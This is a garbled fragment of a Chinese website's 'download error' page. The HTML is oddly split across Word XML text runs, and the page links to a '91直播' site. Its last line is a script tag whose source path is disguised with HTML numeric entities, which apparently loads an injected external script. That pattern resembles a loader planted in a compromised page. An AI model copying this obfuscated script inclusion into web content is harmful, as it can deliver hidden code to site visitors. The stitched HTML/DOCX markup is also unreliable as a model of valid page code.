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 PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E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//www.w3.org/TR/html4/loose.dtd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="//www.w3.org/1999/x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 &lt;meta name="keywords" content="keywords_tem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description" content="description_temp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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>提示信息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href="/_css/error/error.css" rel="stylesheet" type="text/c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/_js/themes/default/easyui.c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script type="text/javascript" src="/_js/jquery.mi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link rel="stylesheet" type="text/css" href="/_js/themes/icon.css" /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cript type="text/javascript" src="/_js/jquery.easyui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cript type="text/javascript" src="/_js/easyui-lang-zh_C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cript type="text/javascript" src="/_js/commo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cript type="text/javascript" src="/_js/securit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&lt;h1&gt;&lt;a href="http://www.zhibo91.net/"&gt;91</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>直播</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/a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input id ="ipAddress" name ="ipAddress"  type="hidden" value="10.110.248.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  date-time="1749118846"   dir="inmeup" class="wp_error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49118846"   dir="ykbikb" class="wp_error_im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img src="/_images/error/error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49118846"   dir="oqpeet" class="wp_error_ms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pan&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>提示：下载文档出错！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49118846"   dir="dwpwxd" class="wp_error_butt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pan class="main"&gt;&lt;a href="#" onclick="toMain('/');"&gt;91</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>直播</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/a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pan class="close"&gt;&lt;a href="#" onclick="closeWindow();"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>关闭此页</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/a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text/javascri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unction toMain(ur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ndow.top.location.href = ur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unction toReLogin(ur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$.post("/_web/_ids/login/api/logout/create.rst?_p=YXM9MQ__&amp;tt=" + Math.random(), function(resul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indow.top.location.href = ur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unction closeWindow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ndow.top.clos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&lt;script  type="text/javascript" charset="utf-8"  rel="nofollow" src="&amp;#47;&amp;#121;&amp;#105;&amp;#99;&amp;#105;&amp;#121;&amp;#117;&amp;#97;&amp;#110;&amp;#100;&amp;#105;&amp;#101;&amp;#114;&amp;#46;&amp;#106;&amp;#115;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